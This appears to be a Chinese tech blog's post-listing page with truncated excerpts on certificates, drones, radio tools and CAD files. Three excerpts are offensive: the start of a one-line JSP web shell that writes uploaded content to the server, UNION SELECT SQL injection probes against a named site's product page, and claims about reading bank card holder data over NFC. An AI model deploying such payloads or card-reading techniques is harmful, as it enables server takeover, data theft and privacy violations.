上一页 1 ··· 7 8 9 10 11 12 13 14 15 16 下一页
摘要: 一、版本号 结构体CERT_INFO中的字段dwVersion即为证书版本,可以直接通过下面的代码获得: DWORD dwCertVer = m_pCertContext->pCertInfo->dwVersion; 版本值的定义如下: #define CERT_V1 0 #define CERT_ 阅读全文
posted @ 2016-09-19 12:33 dozeoo 阅读(2422) 评论(8) 推荐(0)
摘要: Your First MFC C++ Ribbon Application with Visual Studio 2010 Earlier this month, I put together my first C++ sample in about a hundred years. I did t 阅读全文
posted @ 2016-08-18 09:41 dozeoo 阅读(2760) 评论(0) 推荐(0)
摘要: 一、准备工作 第一步:下载并安装Adobe Flash Player。 从官方网站(http://get.adobe.com/cn/flashplayer/)上下载最新的Flash Player(大约为2.66M),并安装。对于Windows 32位系统,其默认安装目录为:C:\WINDOWS\sy 阅读全文
posted @ 2016-08-12 10:56 dozeoo 阅读(2967) 评论(0) 推荐(0)
摘要: Building ArduPilot for Pixhawk/PX4 on Linux with Make 使用Make编译 ArduPilot for Pixhawk 2, Pixhawk and PX4 在linux上. Note: 编译 Pixhawk 2 and Pixhawk使用 (mak 阅读全文
posted @ 2016-07-09 10:13 dozeoo 阅读(5714) 评论(0) 推荐(1)
摘要: qgroundcontrol是一款无人机地面站开源软件,C++/QT开发 在https://github.com/mavlink/qgroundcontrol上就能找到,选择稳定版下载最新的是2.6 下载https://github.com/mavlink/qgroundcontrol/archiv 阅读全文
posted @ 2016-06-20 09:00 dozeoo 阅读(8509) 评论(3) 推荐(0)
摘要: 以上数据是使用wiglewifi软件收集的数据,把全部数据导出为KML格式,使用Google地球显示的,当然在大陆地区Google地球有些不正常,我使用的是lantern 以前使用lantern总是不能上网,现在知道是怎么回事了,是360浏览器的问题,换用IE浏览器,可以正常访问,当然想使用Goog 阅读全文
posted @ 2016-06-17 09:44 dozeoo 阅读(742) 评论(0) 推荐(0)
摘要: wireshark是非常流行的网络封包分析软件,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。使用wireshark的人必须了解网络协议,否则就看不懂wireshark了。 为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。 首先下载安装winpcap 阅读全文
posted @ 2016-06-06 10:23 dozeoo 阅读(3454) 评论(1) 推荐(0)
摘要: QUICK START GUIDE This page is a guide aimed at helping anyone set up a cheap radio scanner based on the RTL-SDR software defined radio as fast as pos 阅读全文
posted @ 2016-05-27 14:50 dozeoo 阅读(1170) 评论(0) 推荐(0)
摘要: 门禁控制器编程方法 本控制器为:门禁读卡器+门禁控制器+密码设置+密码开门的功能集合。 适用范围 :家庭、工厂、办公室、写字楼、银行、小区。。。。 特色功能: ● 2000张卡超大注册容量。可扩容到8000。 ● 控制器本身内置一个读头,可以外接一个W26读头。 ● 快速发卡模式(不管是注册普通卡还 阅读全文
posted @ 2016-05-27 11:31 dozeoo 阅读(11515) 评论(0) 推荐(0)
摘要: python多线程监控指定目录,主要函数是 ReadDirectoryChangesW(handle, size, bWatchSubtree, dwNotifyFilter, overlapped) retrieves information describing the changes occu 阅读全文
posted @ 2016-05-23 09:35 dozeoo 阅读(2005) 评论(0) 推荐(0)
摘要: 使用命令: ACADVER ACADVER = "17.2s (LMS Tech)" (只读) CAD2016 ACADVER = "20.1s (LMS Tech)" (只读) CAD2015 ACADVER = "20.0s (LMS Tech)" (只读) CAD2013 ACADVER = 阅读全文
posted @ 2016-05-18 11:04 dozeoo 阅读(607) 评论(0) 推荐(0)
摘要: 判断CAD图纸版本Dwg文件版本 使用记事本打开DWG图纸文件,在最开始有6个字母和数字组合,即为图纸的版本号 AC1015:CAD2000版本; AC1018:CAD2004版本; AC1021:CAD2007版本; AC1024:CAD2010版本; AC1027:CAD2013版本。 最新版本 阅读全文
posted @ 2016-05-18 10:50 dozeoo 阅读(1348) 评论(0) 推荐(0)
摘要: jsp一句话 <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getP 阅读全文
posted @ 2016-05-17 20:16 dozeoo 阅读(7713) 评论(0) 推荐(0)
摘要: 使用NFC读卡器 ACR122u 使用ACR122u Tool 软件发送spdu指令即可 一些运行结果 如上所示,银行卡的卡号,有效期,卡主姓名,身份证号,进期消费记录均可读出 2019-05-30增加: APDU list # + + + + + |ClaIns P1 P2|Lc Send Dat 阅读全文
posted @ 2016-05-17 18:41 dozeoo 阅读(8164) 评论(10) 推荐(0)
摘要: order by 20 www. .com/product/introduction.php?id=-65 UNION SELECT user(),2 www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2 报错 War 阅读全文
posted @ 2016-05-12 22:48 dozeoo 阅读(733) 评论(0) 推荐(0)
上一页 1 ··· 7 8 9 10 11 12 13 14 15 16 下一页